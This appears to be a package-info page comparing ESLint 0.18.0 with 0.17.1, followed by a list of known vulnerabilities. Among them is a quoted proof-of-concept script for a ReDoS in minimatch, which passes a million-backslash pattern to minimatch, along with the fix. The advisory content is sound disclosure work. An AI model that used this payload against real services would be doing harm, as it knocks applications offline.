ESLint version 0.18.0 represents an incremental update over its predecessor, version 0.17.1, within the popular JavaScript linting tool. Both versions share the core functionality of providing an AST-based pattern checker, aiding developers in maintaining code quality and consistency. The dependencies remain largely consistent between the two versions, ensuring a stable and familiar development environment for users upgrading. The chalk, debug, escope, espree, and js-yaml dependencies persist, reflecting the continued reliance on these packages for core linting operations and configuration parsing.
While the core dependencies are identical, the release date indicates a period of refinement and bug fixing between the versions. Developers can likely expect minor improvements in rule enforcement, performance enhancements, or resolutions to reported issues. The consistent set of devDependencies suggests that the testing and development workflows for ESLint remain largely unchanged, offering stability to contributors and maintainers. For developers using ESLint, upgrading from 0.17.1 to 0.18.0 is likely a low-risk endeavor, offering potential improvements without significant breaking changes. It is advisable to consult the changelog for a detailed list of specific bug fixes and enhancements included in this update. The MIT license continues to apply, ensuring open-source freedom for usage and modification.
All the vulnerabilities related to the version 0.18.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.